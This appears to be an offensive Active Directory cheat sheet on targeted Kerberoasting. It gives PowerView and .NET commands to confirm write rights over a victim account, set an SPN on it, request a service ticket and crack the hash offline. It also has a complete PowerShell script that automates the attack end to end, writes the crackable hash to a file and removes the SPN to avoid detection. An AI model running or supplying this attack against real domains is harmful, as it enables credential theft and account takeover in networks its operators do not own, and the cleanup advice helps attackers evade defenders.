TARGETED KERBEROASTING (SET-SPN ATTACK)

Setting an SPN on a user account we have write access over, then requesting a service ticket for it, is targeted Kerberoasting, also known as the Set-SPN attack. (Targeted AS-REP roasting is the sibling technique that clears the pre-authentication flag on the account instead; the steps below are the Kerberoasting variant.)

Checking the victim's ACL for "GenericAll" or "GenericWrite", either of which allows writing the servicePrincipalName attribute

The right must be granted to the attacker's own account or to a group the attacker is a member of; filter the scan on that identity and confirm that the matching ACE's ObjectDN is the victim

Invoke-ACLScanner -ResolveGUIDs | ?{$_.IdentityReferenceName -match "<OBJECT>"}

Enumerating whether the victim already has an SPN (an account that already has one can be Kerberoasted directly, without modifying the object)

Get-DomainUser -Identity <USERNAME> | Select ServicePrincipalName

Setting an SPN on the victim (any service/host string works, but it must not collide with an SPN already present in the forest, since duplicate SPNs break Kerberos and newer DCs reject the write)

Set-DomainObject -Identity <USERNAME> -Set @{serviceprincipalname='DOMAIN/WHATEVER'} -Verbose

Verifying that the SPN is set by re-running the Get-DomainUser query above; if the write did not land, the ACL check was wrong

Requesting a TGS for the SPN we set. Any authenticated domain user can request a service ticket; the TGS is encrypted with the victim account's long-term key, which is what gets cracked offline

PowerView
Request-SPNTicket -SPN <SPN FQDN>

Get-DomainUser -Identity <USERNAME> | Get-DomainSPNTicket | Select -ExpandProperty Hash
Plain .NET (works from any PowerShell session, no PowerView needed)
Add-Type -AssemblyName System.IdentityModel

New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList <SPN FQDN>

Verifying that the ticket is cached with klist (the .NET method only puts the TGS in the ticket cache; export it with a tool such as Mimikatz or Rubeus before cracking)

CRACK

Crack the extracted hash offline (hashcat mode 13100 for an etype 23 TGS-REP, or john's krb5tgs format). Afterwards clear the SPN again with Set-DomainObject -Clear so the victim object is left as it was found; a lingering SPN on a user account is an easy detection.
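The whole procedure above as one script, an added example that is not from the original page or from PowerView itself. It assumes PowerView.ps1 is already imported in the session, that the current user (or a group it belongs to) holds GenericWrite/GenericAll over the victim, and that the account names, the SPN string and the output file are placeholders to be replaced:

```powershell
# Added example (not part of the original page): targeted Kerberoasting of one
# account with PowerView. Assumes PowerView.ps1 is imported and that $Attacker,
# or a group it belongs to, can write servicePrincipalName on $Victim.
# All names below are placeholders.
param(
    [string]$Victim   = 'victimuser',
    [string]$Attacker = 'attacker',
    [string]$Spn      = 'roast/placeholder.internal',   # any unique service/host string
    [string]$OutFile  = 'targeted_roast.hash'
)

# 1. Confirm we hold a right that allows writing servicePrincipalName.
#    Collect the attacker's own SID plus group SIDs, since the ACE is usually on a group.
$mySids = @((Get-DomainUser -Identity $Attacker).objectsid) +
          @(Get-DomainGroup -MemberIdentity $Attacker | Select-Object -ExpandProperty objectsid)

$aces = Get-DomainObjectAcl -Identity $Victim -ResolveGUIDs |
    Where-Object {
        $mySids -contains $_.SecurityIdentifier.Value -and
        ($_.ActiveDirectoryRights -match 'GenericAll|GenericWrite|WriteProperty')
    }
if (-not $aces) { throw "No write right over $Victim found for $Attacker" }
# For WriteProperty, ObjectAceType must be servicePrincipalName (or unset = all attributes).
$aces | Select-Object ObjectDN, ActiveDirectoryRights, ObjectAceType, SecurityIdentifier

# 2. If the victim already has an SPN, roast that one and leave the object untouched.
$existing = Get-DomainUser -Identity $Victim -Properties serviceprincipalname |
    Select-Object -ExpandProperty serviceprincipalname
if ($existing) {
    Write-Host "[*] $Victim already has SPN(s): $($existing -join ', ')"
    Get-DomainUser -Identity $Victim | Get-DomainSPNTicket -OutputFormat Hashcat |
        Select-Object -ExpandProperty Hash | Out-File $OutFile
    return
}

# 3. Write the SPN, verify it landed, then request a TGS for it.
Set-DomainObject -Identity $Victim -Set @{serviceprincipalname = $Spn} -Verbose
$set = Get-DomainUser -Identity $Victim -Properties serviceprincipalname |
    Select-Object -ExpandProperty serviceprincipalname
if ($set -notcontains $Spn) { throw "SPN write did not take effect; re-check the ACL" }

try {
    # The TGS is encrypted with the victim's long-term key (RC4, etype 23, when the
    # account has no AES keys), which is what makes the hash crackable offline.
    Get-DomainUser -Identity $Victim | Get-DomainSPNTicket -OutputFormat Hashcat |
        Select-Object -ExpandProperty Hash | Out-File $OutFile
    Write-Host "[+] Hash written to $OutFile (crack with hashcat -m 13100)"
}
finally {
    # 4. Clean up even if the ticket request failed: leave the object as we found it.
    Set-DomainObject -Identity $Victim -Clear serviceprincipalname -Verbose
}
```

The try/finally is deliberate: the SPN is the only on-disk change this attack makes, and a user account that suddenly gains an SPN is a common hunting query, so the cleanup should not depend on the ticket request succeeding.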
